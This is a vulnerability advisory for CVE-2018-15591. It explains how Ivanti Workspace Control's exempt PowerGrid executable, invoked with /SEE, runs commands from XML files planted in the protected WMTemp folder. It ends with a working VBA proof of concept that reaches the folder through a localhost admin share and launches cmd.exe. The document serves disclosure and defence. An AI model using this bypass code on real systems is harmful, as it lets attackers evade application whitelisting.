It was found that the PowerGrid application can be used to run arbitrary commands via the
/SEE command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine.
CVE-2018-15591 DOC-69684 - A locally authenticated user with low privileges can bypass Application Whitelisting by leveraging multiple unspecified attack vectors DOC-69682 - Ivanti Workspace Control Files and Folders Security has been improved
This issue was successfully verified on Ivanti Workspace Control version 10.2.950.0.
This issue is mitigated in Ivanti Workspace Control version 10.3.0.0. The fix included in this version prevents the creation of XML files within the WMTemp folder, effectively preventing this issue from being exploited.
Ivanti Workspace Control (formerly known as RES ONE Workspace) is a User Environment Management solution. It contains a number of security features, one of which being Application Whitelisting. Application Whitelisting can be used to only allow approved applications to execute. Whitelisting can be configured in various ways; in Workspace Control a common used method is to whitelist based on path. As of Workspace Control version 10.1 it also is possible to whitelist based on signing certificate.
By design a number of Workspace Control executables are exempted from Application Whitelisting. One of these applications is the PowerGrid application (pwrgrid.exe). It was found that it is possible to use PowerGrid to run any arbitrary application by using the
/SEE command line argument. In order to do so the attacker needs to abuse another vulnerability in Workspace Control. When successfully exploit it allows the attacker to bypass Application Whitelisting.
Workspace Control creates a temporary folder
WMTemp under the logged on user's
AppData folder. This folder is protected by the FileGuard Minifilter driver, meaning that the logged on user is not allowed to create or modify files within this folder. Some Workspace Control applications will create XML files in this folder, which is allowed by FileGuard. These XML files contain commands that need to be started by PowerGrid. After the XML file is created, PowerGrid is invoked with the
/SEE command line argument, and the file name of the XML file that needs to be processed. PowerGrid will load the file from the
WMTemp folder, and run the command as is configured in the XML file.
Normally, FileGuard will prevent the execution of arbitrary commands, because the user can't create any new files within the
WMTemp folder. By abusing another vulnerability in Workspace Control it is possible to bypass FileGuard to create XML files within the WMTemp file. By doing so it is possible for an attacker to bypass Application Whitelisting in order to run arbitrary commands.
Proof of concept
The VBA code below demonstrates this issue. The code tries to run
cmd.exe using the
/SEE command line argument.
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32.dll" () As Integer Private Declare PtrSafe Function ProcessIdToSessionId Lib "kernel32.dll" (ByVal dwProcessId As Integer, ByRef pSessionId As Integer) As Integer Private Sub PowerGridAWLBypass() On Error Resume Next Dim SessionID As Integer Dim appDataPath, resPath If ProcessIdToSessionId(GetCurrentProcessId, SessionID) = 0 Then SessionID = 1 End If appDataPath = Replace(UCase(Environ("LOCALAPPDATA")), "C:", "\\localhost\C$") resPath = Environ("RESPFDIR") Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(appDataPath & "\RES\WM\" & SessionID & "\WMTemp\foo.xml") oFile.WriteLine "<foo><file>cmd.exe</file><showcmd>5</showcmd></foo>" oFile.Close Set fso = Nothing Set oFile = Nothing Shell resPath & "\pwrgrid.exe /SEE foo.xml", vbNormalFocus End Sub